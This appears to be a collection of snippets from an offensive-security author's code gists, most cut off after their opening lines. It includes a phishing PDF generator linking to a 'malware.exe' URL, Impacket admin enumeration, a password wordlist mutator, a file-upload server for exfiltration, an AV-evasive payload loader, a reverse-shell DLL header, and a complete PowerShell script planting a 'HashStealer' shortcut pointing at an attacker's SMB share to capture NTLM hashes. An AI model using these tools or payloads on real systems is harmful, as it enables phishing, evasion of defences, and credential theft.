caueb

#!/usr/bin/env python3
import sys
import datetime
import base64
import re
from urllib.parse import unquote
from scapy.all import sniff, Raw, IP, TCP
from scapy.layers.http import HTTPRequest
from scapy.layers.tls.handshake import TLSClientHello
from scapy.layers.tls.record import TLS

caueb

# Usage:
# python create-pdf.py -i lock.png -t "Confidental" -u https://localhost/malware.exe -x "This document is locked, click anywhere to open." -o mypdf.pdf

import argparse
from reportlab.lib.pagesizes import A4
from reportlab.pdfgen import canvas
from reportlab.lib.utils import ImageReader

def create_pdf_with_image(image_path, output_path, title, url, text):
    c = canvas.Canvas(output_path, pagesize=A4)

caueb

#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
#

caueb

function Get-DefenderExclusions {
    param (
        [string]$LogName = "Microsoft-Windows-Windows Defender/Operational",
        [int]$EventID = 5007
    )

    # Get all event logs with the specified Event ID efficiently
    $events = Get-WinEvent -FilterHashtable @{LogName=$LogName; Id=$EventID}

    # Filter events that contain the word "Exclusions"

caueb

#!/usr/bin/env python3
"""
- Combine 2 different words
- Combine 2 different words and capitalize the first word
- Combine 2 different words and capitalize the second word
- Combine 2 different words and convert both to uppercase (optional)
- Combine 2 different words and mutate into leet speak (optional)
- Combine 2 different words, mutate into leet speak, and convert to uppercase (optional)
- Combine 3 different words
- Combine 3 different words and capitalize the first word

caueb

#!/usr/bin/env python

"""Extend Python's built-in HTTP server to save files.

curl or wget can be used to send files with options similar to the following:

  curl -X PUT --upload-file somefile.txt http://localhost:8000
  wget -O- --method=PUT --body-file=somefile.txt http://localhost:8000/somefile.txt

__Note__: curl automatically appends the filename onto the end of the URL so

caueb

// Payload encoding using HellsShell (https://github.com/NUL0x4C/HellShell)
// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe

#include "Windows.h"
#include "stdio.h"
#include <iostream>
#include <string>
#include <regex>

#define _CRT_SECURE_NO_WARNINGS

caueb

// Create the project as DLL, compile it, and just rename it file.cpl
// Simply double click in the file to run

#include <Windows.h>

__declspec(dllexport) LONG CALLBACK CPlApplet(HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2) {
    MessageBoxA(NULL, "Test", "Caption", MB_OK);
    return 1;
}

caueb

// Compile with MingW: x86_64-w64-mingw32-gcc-win32 reverse.c -shared -lws2_32 -o Hijack.dll.deploy

#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <process.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

caueb

$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("$env:USERPROFILE\\Desktop\\HashStealer.lnk")
$shortcut.TargetPath = '\\\\192.168.150.134\\tools\\app.ico'
$shortcut.Save()